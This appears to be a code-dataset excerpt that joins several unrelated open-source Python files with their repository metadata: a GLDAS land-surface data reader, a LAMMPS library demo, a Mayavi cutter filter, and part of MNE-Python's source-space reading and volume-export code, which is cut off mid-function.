def close(self):
pass
class GLDAS_Noah_v1_025Img(ImageBase):
"""
Class for reading one GLDAS Noah v1 grib file in 0.25 deg grid.
Parameters
----------
filename: string
filename of the GLDAS grib file
mode: string, optional
mode of opening the file, only 'r' is implemented at the moment
parameter : string or list, optional
one or list of ['001', '011', '032', '051', '057', '065', '071',
'085_L1', '085_L2', '085_L3', '085_L4',
'086_L1', '086_L2', '086_L3', '086_L4',
'099', '111', '112', '121', '122',
'131', '132', '138', '155',
'204', '205', '234', '235']
parameters to read, see GLDAS documentation for more information
Default : '086_L1'
subgrid : Cell Grid
Subgrid of the global GLDAS Grid to use for reading image data (e.g only land points)
array_1D: boolean, optional
if set then the data is read into 1D arrays.
Needed for some legacy code.
"""
def __init__(self, filename, mode='r', parameter='086_L1', subgrid=None, array_1D=False):
super(GLDAS_Noah_v1_025Img, self).__init__(filename, mode=mode)
if type(parameter) != list:
parameter = [parameter]
self.parameters = parameter
self.fill_values = np.repeat(9999., 1440 * 120)
self.grid = subgrid if subgrid else GLDAS025Cellgrid()
self.array_1D = array_1D
def read(self, timestamp=None):
return_img = {}
return_metadata = {}
layers = {'085': 1, '086': 1}
try:
grbs = pygrib.open(self.filename)
except IOError as e:
print(e)
print(" ".join([self.filename, "can not be opened"]))
raise e
ids = []
for parameter in self.parameters:
ids.append(int(parameter.split('_')[0]))
parameter_ids = np.unique(np.array(ids))
for message in grbs:
if message['indicatorOfParameter'] in parameter_ids:
parameter_id = '{:03d}'.format(message['indicatorOfParameter'])
param_metadata = {}
# read metadata in any case
param_metadata['units'] = message['units']
param_metadata['long_name'] = message['parameterName']
if parameter_id in layers.keys():
parameter = '_'.join((parameter_id, 'L' +
str(layers[parameter_id])))
if parameter in self.parameters:
param_data = np.concatenate((
self.fill_values,
np.ma.getdata(message['values']).flatten()))
return_img[parameter] = param_data[
self.grid.activegpis]
return_metadata[parameter] = param_metadata
layers[parameter_id] += 1
else:
parameter = parameter_id
param_data = np.concatenate((
self.fill_values,
np.ma.getdata(message['values']).flatten()))
return_img[parameter] = param_data[self.grid.activegpis]
return_metadata[parameter] = param_metadata
grbs.close()
for parameter in self.parameters:
try:
return_img[parameter]
except KeyError:
print(self.filename[self.filename.rfind('GLDAS'):],
'corrupt file - filling image with nan values')
return_img[parameter] = np.empty(self.grid.n_gpi)
return_img[parameter].fill(np.nan)
if self.array_1D:
return Image(self.grid.activearrlon,
self.grid.activearrlat,
return_img,
return_metadata,
timestamp)
else:
for key in return_img:
return_img[key] = np.flipud(
return_img[key].reshape((720, 1440)))
lons = np.flipud(self.grid.activearrlon.reshape((720, 1440)))
lats = np.flipud(self.grid.activearrlat.reshape((720, 1440)))
return Image(lons, lats, return_img, return_metadata, timestamp)
def write(self, data):
raise NotImplementedError()
def flush(self):
pass
def close(self):
pass
class GLDAS_Noah_v21_025Ds(MultiTemporalImageBase):
"""
Class for reading GLDAS v2.1 images in nc format.
Parameters
----------
data_path : string
Path to the nc files
parameter : string or list, optional
one or list of parameters to read, see GLDAS v2.1 documentation
for more information (default: 'SoilMoi0_10cm_inst').
subgrid : Cell Grid
Subgrid of the global GLDAS Grid to use for reading image data (e.g only land points)
array_1D: boolean, optional
If set then the data is read into 1D arrays.
Needed for some legacy code.
"""
def __init__(self, data_path, parameter='SoilMoi0_10cm_inst',
subgrid=None, array_1D=False):
ioclass_kws = {'parameter': parameter,
'subgrid': subgrid,
'array_1D': array_1D}
sub_path = ['%Y', '%j']
filename_templ = "GLDAS_NOAH025_3H.A{datetime}.*.nc4"
super(GLDAS_Noah_v21_025Ds, self).__init__(data_path, GLDAS_Noah_v21_025Img,
fname_templ=filename_templ,
datetime_format="%Y%m%d.%H%M",
subpath_templ=sub_path,
exact_templ=False,
ioclass_kws=ioclass_kws)
def tstamps_for_daterange(self, start_date, end_date):
"""
return timestamps for daterange,
Parameters
----------
start_date: datetime
start of date range
end_date: datetime
end of date range
Returns
-------
timestamps : list
list of datetime objects of each available image between
start_date and end_date
"""
img_offsets = np.array([timedelta(hours=0), timedelta(hours=3),
timedelta(hours=6), timedelta(hours=9),
timedelta(hours=12), timedelta(hours=15),
timedelta(hours=18), timedelta(hours=21)])
timestamps = []
diff = end_date - start_date
for i in range(diff.days + 1):
daily_dates = start_date + timedelta(days=i) + img_offsets
timestamps.extend(daily_dates.tolist())
return timestamps
class GLDAS_Noah_v1_025Ds(MultiTemporalImageBase):
"""
Class for reading GLDAS images in grib format.
Parameters
----------
data_path : string
path to the grib files
parameter : string or list, optional
one or list of ['001', '011', '032', '051', '057', '065', '071',
'085_L1', '085_L2', '085_L3', '085_L4',
'086_L1', '086_L2', '086_L3', '086_L4',
'099', '111', '112', '121', '122', '131', '132', '138',
'155', '204', '205', '234', '235']
parameters to read, see GLDAS documentation for more information
Default : '086_L1'
subgrid : Cell Grid
Subgrid of the global GLDAS Grid to use for reading image data (e.g only land points)
array_1D: boolean, optional
if set then the data is read into 1D arrays.
Needed for some legacy code.
"""
def __init__(self, data_path, parameter='086_L1', subgrid=None, array_1D=False):
ioclass_kws = {'parameter': parameter,
'subgrid': subgrid,
'array_1D': array_1D}
sub_path = ['%Y', '%j']
filename_templ = "GLDAS_NOAH025SUBP_3H.A{datetime}.001.*.grb"
super(GLDAS_Noah_v1_025Ds, self).__init__(
data_path, GLDAS_Noah_v1_025Img, fname_templ=filename_templ,
datetime_format="%Y%j.%H%M", subpath_templ=sub_path,
exact_templ=False, ioclass_kws=ioclass_kws)
def tstamps_for_daterange(self, start_date, end_date):
"""
return timestamps for daterange,
Parameters
----------
start_date: datetime
start of date range
end_date: datetime
end of date range
Returns
-------
timestamps : list
list of datetime objects of each available image between
start_date and end_date
"""
img_offsets = np.array([timedelta(hours=0), timedelta(hours=3),
timedelta(hours=6), timedelta(hours=9),
timedelta(hours=12), timedelta(hours=15),
timedelta(hours=18), timedelta(hours=21)])
timestamps = []
diff = end_date - start_date
for i in range(diff.days + 1):
daily_dates = start_date + timedelta(days=i) + img_offsets
timestamps.extend(daily_dates.tolist())
return timestamps
class GLDASTs(GriddedNcOrthoMultiTs):
def __init__(self, ts_path, grid_path=None, **kwargs):
'''
Class for reading GLDAS time series after reshuffling.
Parameters
----------
ts_path : str
Directory where the netcdf time series files are stored
grid_path : str, optional (default: None)
Path to grid file, that is used to organize the location of time
series to read. If None is passed, grid.nc is searched for in the
ts_path.
Optional keyword arguments that are passed to the Gridded Base:
------------------------------------------------------------------------
parameters : list, optional (default: None)
Specific variable names to read, if None are selected, all are read.
offsets : dict, optional (default:None)
Offsets (values) that are added to the parameters (keys)
scale_factors : dict, optional (default:None)
Offset (value) that the parameters (key) is multiplied with
ioclass_kws: dict
Optional keyword arguments to pass to OrthoMultiTs class:
----------------------------------------------------------------
read_bulk : boolean, optional (default:False)
if set to True the data of all locations is read into memory,
and subsequent calls to read_ts read from the cache and not from disk
this makes reading complete files faster#
read_dates : boolean, optional (default:False)
if false dates will not be read automatically but only on specific
request useable for bulk reading because currently the netCDF
num2date routine is very slow for big datasets
'''
if grid_path is None:
grid_path = os.path.join(ts_path, "grid.nc")
grid = load_grid(grid_path)
super(GLDASTs, self).__init__(ts_path, grid, **kwargs) | wpreimes/gldas | src/gldas/interface.py | Python | bsd-3-clause | 16,937 | [
"NetCDF"
] | 19c6e282d87ce9b6cdd59b621f42196e8b3761e7b8bee98ae6dfa7049770316e |
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# demo.py
# Purpose: illustrate use of many library interface commands
# Syntax: demo.py
# uses in.demo as LAMMPS input script
from __future__ import print_function
import sys
# parse command line
argv = sys.argv
if len(argv) != 1:
print("Syntax: demo.py")
sys.exit()
from lammps import lammps
lmp = lammps()
# test out various library functions after running in.demo
lmp.file("in.demo")
print("\nPython output:")
natoms = lmp.extract_global("natoms",0)
mass = lmp.extract_atom("mass",2)
x = lmp.extract_atom("x",3)
print("Natoms, mass, x[0][0] coord =",natoms,mass[1],x[0][0])
temp = lmp.extract_compute("thermo_temp",0,0)
print("Temperature from compute =",temp)
eng = lmp.extract_variable("eng",None,0)
print("Energy from equal-style variable =",eng)
vy = lmp.extract_variable("vy","all",1)
print("Velocity component from atom-style variable =",vy[1])
vol = lmp.get_thermo("vol")
print("Volume from get_thermo = ",vol)
natoms = lmp.get_natoms()
print("Natoms from get_natoms =",natoms)
xc = lmp.gather_atoms("x",1,3)
print("Global coords from gather_atoms =",xc[0],xc[1],xc[31])
xc[0] = xc[0] + 1.0
lmp.scatter_atoms("x",1,3,xc)
print("Changed x[0][0] via scatter_atoms =",x[0][0])
| Pakketeretet2/lammps | python/examples/demo.py | Python | gpl-2.0 | 1,302 | [
"LAMMPS"
] | feffb91a1dccc757f712af376a4bfe7aacded9e2fcbab355ab24f64c1a0f97b5 |
"""A simple wrapper for `tvtk.Cutter`.
"""
# Author: Prabhu Ramachandran <prabhu_r@users.sf.net>
# Copyright (c) 2005-2008, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import Instance, Property
from traitsui.api import View, Group, Item
from tvtk.api import tvtk
# Local imports.
from mayavi.core.component import Component
######################################################################
# `Cutter` class.
######################################################################
class Cutter(Component):
# The version of this class. Used for persistence.
__version__ = 0
# The mapper.
cutter = Instance(tvtk.Cutter, args=())
# The cut function. This should be a delegate but due to a bug in
# traits that does not work.
cut_function = Property
########################################
# View related traits.
view = View(Group(Item(name='cutter',
style='custom',
resizable=True),
show_labels=False),
resizable=True)
######################################################################
# `Component` interface
######################################################################
def update_pipeline(self):
"""Override this method so that it *updates* the tvtk pipeline
when data upstream is known to have changed.
This method is invoked (automatically) when the input fires a
`pipeline_changed` event.
"""
if (len(self.inputs) == 0) or (len(self.inputs[0].outputs) == 0):
return
c = self.cutter
self.configure_connection(c, self.inputs[0])
c.update()
self.outputs = [c.output]
def update_data(self):
"""Override this method to do what is necessary when upstream
data changes.
This method is invoked (automatically) when any of the inputs
sends a `data_changed` event.
"""
self.data_changed = True
######################################################################
# `Cutter` interface
######################################################################
def _get_cut_function(self):
return self.cutter.cut_function
def _set_cut_function(self, val):
old = self.cutter.cut_function
self.cutter.cut_function = val
self.trait_property_changed('cut_function', old, val)
| dmsurti/mayavi | mayavi/components/cutter.py | Python | bsd-3-clause | 2,478 | [
"Mayavi"
] | bfd4bdecd4445d0a5e03e69aed198b155d4953efa89258d96d74b3e8c66bc7ad |
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
import numpy as np
import os
import os.path as op
from scipy import sparse, linalg
from copy import deepcopy
from .io.constants import FIFF
from .io.tree import dir_tree_find
from .io.tag import find_tag, read_tag
from .io.open import fiff_open
from .io.write import (start_block, end_block, write_int,
write_float_sparse_rcs, write_string,
write_float_matrix, write_int_matrix,
write_coord_trans, start_file, end_file, write_id)
from .bem import read_bem_surfaces
from .surface import (read_surface, _create_surf_spacing, _get_ico_surface,
_tessellate_sphere_surf, _get_surf_neighbors,
_read_surface_geom, _normalize_vectors,
_complete_surface_info, _compute_nearest,
fast_cross_3d, _fast_cross_nd_sum, mesh_dist,
_triangle_neighbors)
from .utils import (get_subjects_dir, run_subprocess, has_freesurfer,
has_nibabel, check_fname, logger, verbose,
check_version, _get_call_line)
from .fixes import in1d, partial, gzip_open, meshgrid
from .parallel import parallel_func, check_n_jobs
from .transforms import (invert_transform, apply_trans, _print_coord_trans,
combine_transforms, _get_mri_head_t,
_coord_frame_name, Transform)
from .externals.six import string_types
def _get_lut():
"""Helper to get the FreeSurfer LUT"""
data_dir = op.join(op.dirname(__file__), 'data')
lut_fname = op.join(data_dir, 'FreeSurferColorLUT.txt')
return np.genfromtxt(lut_fname, dtype=None,
usecols=(0, 1), names=['id', 'name'])
def _get_lut_id(lut, label, use_lut):
"""Helper to convert a label to a LUT ID number"""
if not use_lut:
return 1
assert isinstance(label, string_types)
mask = (lut['name'] == label.encode('utf-8'))
assert mask.sum() == 1
return lut['id'][mask]
class SourceSpaces(list):
"""Represent a list of source space
Currently implemented as a list of dictionaries containing the source
space information
Parameters
----------
source_spaces : list
A list of dictionaries containing the source space information.
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
Attributes
----------
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
"""
def __init__(self, source_spaces, info=None):
super(SourceSpaces, self).__init__(source_spaces)
if info is None:
self.info = dict()
else:
self.info = dict(info)
def __repr__(self):
ss_repr = []
for ss in self:
ss_type = ss['type']
if ss_type == 'vol':
if 'seg_name' in ss:
r = ("'vol' (%s), n_used=%i"
% (ss['seg_name'], ss['nuse']))
else:
r = ("'vol', shape=%s, n_used=%i"
% (repr(ss['shape']), ss['nuse']))
elif ss_type == 'surf':
r = "'surf', n_vertices=%i, n_used=%i" % (ss['np'], ss['nuse'])
else:
r = "%r" % ss_type
coord_frame = ss['coord_frame']
if isinstance(coord_frame, np.ndarray):
coord_frame = coord_frame[0]
r += ', coordinate_frame=%s' % _coord_frame_name(coord_frame)
ss_repr.append('<%s>' % r)
ss_repr = ', '.join(ss_repr)
return "<SourceSpaces: [{ss}]>".format(ss=ss_repr)
def __add__(self, other):
return SourceSpaces(list.__add__(self, other))
def copy(self):
"""Make a copy of the source spaces
Returns
-------
src : instance of SourceSpaces
The copied source spaces.
"""
src = deepcopy(self)
return src
def save(self, fname):
"""Save the source spaces to a fif file
Parameters
----------
fname : str
File to write.
"""
write_source_spaces(fname, self)
@verbose
def export_volume(self, fname, include_surfaces=True,
include_discrete=True, dest='mri', trans=None,
mri_resolution=False, use_lut=True, verbose=None):
"""Exports source spaces to nifti or mgz file
Parameters
----------
fname : str
Name of nifti or mgz file to write.
include_surfaces : bool
If True, include surface source spaces.
include_discrete : bool
If True, include discrete source spaces.
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of the
original T1 image. If 'surf' the coordinate system of the
FreeSurfer surface is used (Surface RAS).
trans : dict, str, or None
Either a transformation filename (usually made using mne_analyze)
or an info dict (usually opened using read_trans()).
If string, an ending of `.fif` or `.fif.gz` will be assumed to be
in FIF format, any other ending will be assumed to be a text file
with a 4x4 transformation matrix (like the `--trans` MNE-C option.
Must be provided if source spaces are in head coordinates and
include_surfaces and mri_resolution are True.
mri_resolution : bool
If True, the image is saved in MRI resolution
(e.g. 256 x 256 x 256).
use_lut : bool
If True, assigns a numeric value to each source space that
corresponds to a color on the freesurfer lookup table.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Notes
-----
This method requires nibabel.
"""
# import nibabel or raise error
try:
import nibabel as nib
except ImportError:
raise ImportError('This function requires nibabel.')
# Check coordinate frames of each source space
coord_frames = np.array([s['coord_frame'] for s in self])
# Raise error if trans is not provided when head coordinates are used
# and mri_resolution and include_surfaces are true
if (coord_frames == FIFF.FIFFV_COORD_HEAD).all():
coords = 'head' # all sources in head coordinates
if mri_resolution and include_surfaces:
if trans is None:
raise ValueError('trans containing mri to head transform '
'must be provided if mri_resolution and '
'include_surfaces are true and surfaces '
'are in head coordinates')
elif trans is not None:
logger.info('trans is not needed and will not be used unless '
'include_surfaces and mri_resolution are True.')
elif (coord_frames == FIFF.FIFFV_COORD_MRI).all():
coords = 'mri' # all sources in mri coordinates
if trans is not None:
logger.info('trans is not needed and will not be used unless '
'sources are in head coordinates.')
# Raise error if all sources are not in the same space, or sources are
# not in mri or head coordinates
else:
raise ValueError('All sources must be in head coordinates or all '
'sources must be in mri coordinates.')
# use lookup table to assign values to source spaces
logger.info('Reading FreeSurfer lookup table')
# read the lookup table
lut = _get_lut()
# Setup a dictionary of source types
src_types = dict(volume=[], surface=[], discrete=[])
# Populate dictionary of source types
for src in self:
# volume sources
if src['type'] == 'vol':
src_types['volume'].append(src)
# surface sources
elif src['type'] == 'surf':
src_types['surface'].append(src)
# discrete sources
elif src['type'] == 'discrete':
src_types['discrete'].append(src)
# raise an error if dealing with source type other than volume
# surface or discrete
else:
raise ValueError('Unrecognized source type: %s.' % src['type'])
# Get shape, inuse array and interpolation matrix from volume sources
first_vol = True # mark the first volume source
# Loop through the volume sources
for vs in src_types['volume']:
# read the lookup table value for segmented volume
if 'seg_name' not in vs:
raise ValueError('Volume sources should be segments, '
'not the entire volume.')
# find the color value for this volume
i = _get_lut_id(lut, vs['seg_name'], use_lut)
if first_vol:
# get the inuse array
if mri_resolution:
# read the mri file used to generate volumes
aseg = nib.load(vs['mri_file'])
# get the voxel space shape
shape3d = (vs['mri_height'], vs['mri_depth'],
vs['mri_width'])
# get the values for this volume
inuse = i * (aseg.get_data() == i).astype(int)
# store as 1D array
inuse = inuse.ravel((2, 1, 0))
else:
inuse = i * vs['inuse']
# get the volume source space shape
shape = vs['shape']
# read the shape in reverse order
# (otherwise results are scrambled)
shape3d = (shape[2], shape[1], shape[0])
first_vol = False
else:
# update the inuse array
if mri_resolution:
# get the values for this volume
use = i * (aseg.get_data() == i).astype(int)
inuse += use.ravel((2, 1, 0))
else:
inuse += i * vs['inuse']
# Raise error if there are no volume source spaces
if first_vol:
raise ValueError('Source spaces must contain at least one volume.')
# create 3d grid in the MRI_VOXEL coordinate frame
# len of inuse array should match shape regardless of mri_resolution
assert len(inuse) == np.prod(shape3d)
# setup the image in 3d space
img = inuse.reshape(shape3d).T
# include surface and/or discrete source spaces
if include_surfaces or include_discrete:
# setup affine transform for source spaces
if mri_resolution:
# get the MRI to MRI_VOXEL transform
affine = invert_transform(vs['vox_mri_t'])
else:
# get the MRI to SOURCE (MRI_VOXEL) transform
affine = invert_transform(vs['src_mri_t'])
# modify affine if in head coordinates
if coords == 'head':
# read mri -> head transformation
mri_head_t = _get_mri_head_t(trans)[0]
# get the HEAD to MRI transform
head_mri_t = invert_transform(mri_head_t)
# combine transforms, from HEAD to MRI_VOXEL
affine = combine_transforms(head_mri_t, affine,
'head', 'mri_voxel')
# loop through the surface source spaces
if include_surfaces:
# get the surface names (assumes left, right order. may want
# to add these names during source space generation
surf_names = ['Left-Cerebral-Cortex', 'Right-Cerebral-Cortex']
for i, surf in enumerate(src_types['surface']):
# convert vertex positions from their native space
# (either HEAD or MRI) to MRI_VOXEL space
srf_rr = apply_trans(affine['trans'], surf['rr'])
# convert to numeric indices
ix_orig, iy_orig, iz_orig = srf_rr.T.round().astype(int)
# clip indices outside of volume space
ix_clip = np.maximum(np.minimum(ix_orig, shape3d[2] - 1),
0)
iy_clip = np.maximum(np.minimum(iy_orig, shape3d[1] - 1),
0)
iz_clip = np.maximum(np.minimum(iz_orig, shape3d[0] - 1),
0)
# compare original and clipped indices
n_diff = np.array((ix_orig != ix_clip, iy_orig != iy_clip,
iz_orig != iz_clip)).any(0).sum()
# generate use warnings for clipping
if n_diff > 0:
logger.warning('%s surface vertices lay outside '
'of volume space. Consider using a '
'larger volume space.' % n_diff)
# get surface id or use default value
i = _get_lut_id(lut, surf_names[i], use_lut)
# update image to include surface voxels
img[ix_clip, iy_clip, iz_clip] = i
# loop through discrete source spaces
if include_discrete:
for i, disc in enumerate(src_types['discrete']):
# convert vertex positions from their native space
# (either HEAD or MRI) to MRI_VOXEL space
disc_rr = apply_trans(affine['trans'], disc['rr'])
# convert to numeric indices
ix_orig, iy_orig, iz_orig = disc_rr.T.astype(int)
# clip indices outside of volume space
ix_clip = np.maximum(np.minimum(ix_orig, shape3d[2] - 1),
0)
iy_clip = np.maximum(np.minimum(iy_orig, shape3d[1] - 1),
0)
iz_clip = np.maximum(np.minimum(iz_orig, shape3d[0] - 1),
0)
# compare original and clipped indices
n_diff = np.array((ix_orig != ix_clip, iy_orig != iy_clip,
iz_orig != iz_clip)).any(0).sum()
# generate use warnings for clipping
if n_diff > 0:
logger.warning('%s discrete vertices lay outside '
'of volume space. Consider using a '
'larger volume space.' % n_diff)
# set default value
img[ix_clip, iy_clip, iz_clip] = 1
if use_lut:
logger.info('Discrete sources do not have values on '
'the lookup table. Defaulting to 1.')
# calculate affine transform for image (MRI_VOXEL to RAS)
if mri_resolution:
# MRI_VOXEL to MRI transform
transform = vs['vox_mri_t'].copy()
else:
# MRI_VOXEL to MRI transform
# NOTE: 'src' indicates downsampled version of MRI_VOXEL
transform = vs['src_mri_t'].copy()
if dest == 'mri':
# combine with MRI to RAS transform
transform = combine_transforms(transform, vs['mri_ras_t'],
transform['from'],
vs['mri_ras_t']['to'])
# now setup the affine for volume image
affine = transform['trans']
# make sure affine converts from m to mm
affine[:3] *= 1e3
# save volume data
# setup image for file
if fname.endswith(('.nii', '.nii.gz')): # save as nifit
# setup the nifti header
hdr = nib.Nifti1Header()
hdr.set_xyzt_units('mm')
# save the nifti image
img = nib.Nifti1Image(img, affine, header=hdr)
elif fname.endswith('.mgz'): # save as mgh
# convert to float32 (float64 not currently supported)
img = img.astype('float32')
# save the mgh image
img = nib.freesurfer.mghformat.MGHImage(img, affine)
else:
raise(ValueError('Unrecognized file extension'))
# write image to file
nib.save(img, fname)
def _add_patch_info(s):
"""Patch information in a source space
Generate the patch information from the 'nearest' vector in
a source space. For vertex in the source space it provides
the list of neighboring vertices in the high resolution
triangulation.
Parameters
----------
s : dict
The source space.
"""
nearest = s['nearest']
if nearest is None:
s['pinfo'] = None
s['patch_inds'] = None
return
logger.info(' Computing patch statistics...')
indn = np.argsort(nearest)
nearest_sorted = nearest[indn]
steps = np.where(nearest_sorted[1:] != nearest_sorted[:-1])[0] + 1
starti = np.r_[[0], steps]
stopi = np.r_[steps, [len(nearest)]]
pinfo = list()
for start, stop in zip(starti, stopi):
pinfo.append(np.sort(indn[start:stop]))
s['pinfo'] = pinfo
# compute patch indices of the in-use source space vertices
patch_verts = nearest_sorted[steps - 1]
s['patch_inds'] = np.searchsorted(patch_verts, s['vertno'])
logger.info(' Patch information added...')
@verbose
def _read_source_spaces_from_tree(fid, tree, patch_stats=False,
verbose=None):
"""Read the source spaces from a FIF file
Parameters
----------
fid : file descriptor
An open file descriptor.
tree : dict
The FIF tree structure if source is a file id.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : SourceSpaces
The source spaces.
"""
# Find all source spaces
spaces = dir_tree_find(tree, FIFF.FIFFB_MNE_SOURCE_SPACE)
if len(spaces) == 0:
raise ValueError('No source spaces found')
src = list()
for s in spaces:
logger.info(' Reading a source space...')
this = _read_one_source_space(fid, s)
logger.info(' [done]')
if patch_stats:
_complete_source_space_info(this)
src.append(this)
logger.info(' %d source spaces read' % len(spaces))
return SourceSpaces(src)
@verbose
def read_source_spaces(fname, patch_stats=False, verbose=None):
"""Read the source spaces from a FIF file
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : SourceSpaces
The source spaces.
See Also
--------
write_source_spaces, setup_source_space, setup_volume_source_space
"""
# be more permissive on read than write (fwd/inv can contain src)
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
'-fwd.fif', '-fwd.fif.gz',
'-inv.fif', '-inv.fif.gz'))
ff, tree, _ = fiff_open(fname)
with ff as fid:
src = _read_source_spaces_from_tree(fid, tree, patch_stats=patch_stats,
verbose=verbose)
src.info['fname'] = fname
node = dir_tree_find(tree, FIFF.FIFFB_MNE_ENV)
if node:
node = node[0]
for p in range(node['nent']):
kind = node['directory'][p].kind
pos = node['directory'][p].pos
tag = read_tag(fid, pos)
if kind == FIFF.FIFF_MNE_ENV_WORKING_DIR:
src.info['working_dir'] = tag.data
elif kind == FIFF.FIFF_MNE_ENV_COMMAND_LINE:
src.info['command_line'] = tag.data
return src
@verbose
def _read_one_source_space(fid, this, verbose=None):
"""Read one source space
"""
FIFF_BEM_SURF_NTRI = 3104
FIFF_BEM_SURF_TRIANGLES = 3106
res = dict()
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_ID)
if tag is None:
res['id'] = int(FIFF.FIFFV_MNE_SURF_UNKNOWN)
else:
res['id'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE)
if tag is None:
raise ValueError('Unknown source space type')
else:
src_type = int(tag.data)
if src_type == FIFF.FIFFV_MNE_SPACE_SURFACE:
res['type'] = 'surf'
elif src_type == FIFF.FIFFV_MNE_SPACE_VOLUME:
res['type'] = 'vol'
elif src_type == FIFF.FIFFV_MNE_SPACE_DISCRETE:
res['type'] = 'discrete'
else:
raise ValueError('Unknown source space type (%d)' % src_type)
if res['type'] == 'vol':
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS)
if tag is not None:
res['shape'] = tuple(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_COORD_TRANS)
if tag is not None:
res['src_mri_t'] = tag.data
parent_mri = dir_tree_find(this, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
if len(parent_mri) == 0:
# MNE 2.7.3 (and earlier) didn't store necessary information
# about volume coordinate translations. Although there is a
# FFIF_COORD_TRANS in the higher level of the FIFF file, this
# doesn't contain all the info we need. Safer to return an
# error unless a user really wants us to add backward compat.
raise ValueError('Can not find parent MRI location. The volume '
'source space may have been made with an MNE '
'version that is too old (<= 2.7.3). Consider '
'updating and regenerating the inverse.')
mri = parent_mri[0]
for d in mri['directory']:
if d.kind == FIFF.FIFF_COORD_TRANS:
tag = read_tag(fid, d.pos)
trans = tag.data
if trans['from'] == FIFF.FIFFV_MNE_COORD_MRI_VOXEL:
res['vox_mri_t'] = tag.data
if trans['to'] == FIFF.FIFFV_MNE_COORD_RAS:
res['mri_ras_t'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR)
if tag is not None:
res['interpolator'] = tag.data
else:
logger.info("Interpolation matrix for MRI not found.")
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE)
if tag is not None:
res['mri_file'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MRI_WIDTH)
if tag is not None:
res['mri_width'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_HEIGHT)
if tag is not None:
res['mri_height'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_DEPTH)
if tag is not None:
res['mri_depth'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MNE_FILE_NAME)
if tag is not None:
res['mri_volume_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS)
if tag is not None:
nneighbors = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS)
offset = 0
neighbors = []
for n in nneighbors:
neighbors.append(tag.data[offset:offset + n])
offset += n
res['neighbor_vert'] = neighbors
tag = find_tag(fid, this, FIFF.FIFF_COMMENT)
if tag is not None:
res['seg_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS)
if tag is None:
raise ValueError('Number of vertices not found')
res['np'] = int(tag.data)
tag = find_tag(fid, this, FIFF_BEM_SURF_NTRI)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI)
if tag is None:
res['ntri'] = 0
else:
res['ntri'] = int(tag.data)
else:
res['ntri'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COORD_FRAME)
if tag is None:
raise ValueError('Coordinate frame information not found')
res['coord_frame'] = tag.data
# Vertices, normals, and triangles
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS)
if tag is None:
raise ValueError('Vertex data not found')
res['rr'] = tag.data.astype(np.float) # double precision for mayavi
if res['rr'].shape[0] != res['np']:
raise ValueError('Vertex information is incorrect')
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS)
if tag is None:
raise ValueError('Vertex normals not found')
res['nn'] = tag.data
if res['nn'].shape[0] != res['np']:
raise ValueError('Vertex normal information is incorrect')
if res['ntri'] > 0:
tag = find_tag(fid, this, FIFF_BEM_SURF_TRIANGLES)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES)
if tag is None:
raise ValueError('Triangulation not found')
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
if res['tris'].shape[0] != res['ntri']:
raise ValueError('Triangulation information is incorrect')
else:
res['tris'] = None
# Which vertices are active
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE)
if tag is None:
res['nuse'] = 0
res['inuse'] = np.zeros(res['nuse'], dtype=np.int)
res['vertno'] = None
else:
res['nuse'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION)
if tag is None:
raise ValueError('Source selection information missing')
res['inuse'] = tag.data.astype(np.int).T
if len(res['inuse']) != res['np']:
raise ValueError('Incorrect number of entries in source space '
'selection')
res['vertno'] = np.where(res['inuse'])[0]
# Use triangulation
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_USE_TRIANGLES)
if tag1 is None or tag2 is None:
res['nuse_tri'] = 0
res['use_tris'] = None
else:
res['nuse_tri'] = tag1.data
res['use_tris'] = tag2.data - 1 # index start at 0 in Python
# Patch-related information
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEAREST)
